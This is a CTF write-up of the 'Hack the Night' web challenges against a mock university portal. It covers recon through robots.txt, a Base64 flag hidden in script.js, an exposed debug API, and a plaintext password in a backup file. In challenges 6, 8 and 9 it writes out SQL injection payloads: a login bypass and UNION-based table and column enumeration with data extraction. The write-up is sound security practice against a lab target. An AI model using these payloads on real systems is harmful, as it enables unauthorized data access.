Hack the Night series

Hack the Night CTF Series

The Hack the Night series presents an excellent collection of web challenges where the objective is to discover all vulnerabilities layered within the application. While this was a team effort, I'll focus on the challenges I solved independently.

Application Overview

The target application presents itself as a university portal with several sections: courses, news, research, and a login page. This typical academic interface hides multiple security vulnerabilities waiting to be discovered.

Challenge 2: Hidden Paths

Description:

NVU claims that they need their site SEO-optimized and that their site needs to allow web crawlers to access certain directories. But we’re almost certain this gave DEADFACE the intel they needed to plan their attack on the site. Find the flag associated with the document that web crawlers are meant to access.

My first instinct when approaching any web application is to check for robots.txt, and this proved to be the right approach:

The robots.txt file revealed several interesting endpoints:

/admin.php
/api/
/backup/
/config/
/.git/
/secret_files/
/api/debug.php
/phpinfo.php

I saved these endpoints for later exploration, as they would prove useful in subsequent challenges.

Challenge 4: Stick to the Script

Description:

NVU thought they were being clever by obfuscating some of their code, but DEADFACE was able to figure it out. Despite this, NVU hasn’t remediated the issue; we’re pretty sure the secret they tried to hide in their code is still there - easily readable to anyone who sees it. Find the flag that is obfuscated in the web app’s code.

I immediately inspected the script.js file that loads with the main page. On line 27, I discovered a Base64-encoded string that was clearly our flag:

Challenge 5: Pest Control

Description:

NVU has an API that we believe was leveraged by DEADFACE to gain configuration information that aided them in their attack on NVU’s website. The API likely exposes sensitive information.

Remembering the endpoints from robots.txt, I navigated to /api/debug.php:

The debug interface provided instructions on how to use debug mode. When I accessed /api/debug.php?show=config, the flag appeared:

Challenge 6: Access Granted

Description:

We need to gain authenticated access to the web app, but we want to see if we can do it the way DEADFACE did. NVU admits they haven’t fixed anything regarding their authentication process. See if you can login to the web app.

The challenge hint pointed toward the authentication process, so I focused on the login page:

The test student account didn't reveal anything interesting, so I attempted a classic SQL injection with admin':

The error message confirmed SQL injection vulnerability:

Login failed: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'aa')' at line 1

A simple authentication bypass using admin'-- granted me access:

Challenge 7: Reverse Course

Description:

One of the accounts that DEADFACE compromised was an admin-level user. NVU has since removed the account, but there still might be information about the account located in the web app. See if you can find the password that belongs to the Emergency Admin user account.

I recalled the /backup/ path from earlier exploration. Navigating there revealed a directory listing:

After downloading and examining the SQL backup file, I found the password in plaintext: EmergencyAccess2025!

So the flag become: deadface{EmergencyAccess2025!}

Challenge 8: Not-So-Public Domain

Description:

DEADFACE was able to retrieve an announcement that was hidden by administrators. This announcement contained sensitive information (flag) that DEADFACE was able to compromise. Find the flag associated with the hidden announcement.

The challenge hint mentioned that database queries might reveal additional records:

Revisiting script.js, I discovered another API endpoint: /api/search.php?q=test&type=announcements

The endpoint returned:

{
    "status": "success",
    "type": "announcements",
    "query": "test",
    "count": 0,
    "results": []
}

I tested for SQL injection by removing the last parameter and using q='+OR+1=1--+:

Challenge 9: Classified

Description:

NVU had confidential research data that was compromised by DEADFACE and leaked to the public. NVU insists that their confidential data was safeguarded and only provided to authorized users on the web app. See if you can identify the flag associated with the classified research present on the web application.

Building on the SQL injection from the previous challenge, I first determined the column count using: /api/search.php?q=test'+UNION+SELECT+NULL,NULL,NULL,NULL--+

With four columns identified, I enumerated the database tables:
/api/search.php?q='+UNION+SELECT+table_name,NULL,NULL,NULL+FROM+information_schema.tables--+

This revealed a research_projects table:

{
    "title": "research_projects",
    "content": null,
    "author": null,
    "posted_at": null
}

Next, I extracted the column names from the research_projects table:
/api/search.php?q='+UNION+SELECT+column_name,NULL,NULL,NULL+FROM+information_schema.columns+WHERE+table_name='research_projects'--+

The response revealed the table structure with columns: id, project_name, lead_researcher, classified, details, and funding_amount.
Finally, I crafted the payload to extract the classified research data:
/api/search.php?q='+UNION+SELECT+project_name,details,lead_researcher,classified+FROM+research_projects--+

Hack the Night series summary

Successfully completed seven challenges in the Hack the Night series:

This series provided excellent practice in web application security fundamentals, including information disclosure, SQL injection, authentication bypass, and API exploitation. The challenges built upon each other nicely, with discoveries from earlier tasks proving useful in later ones.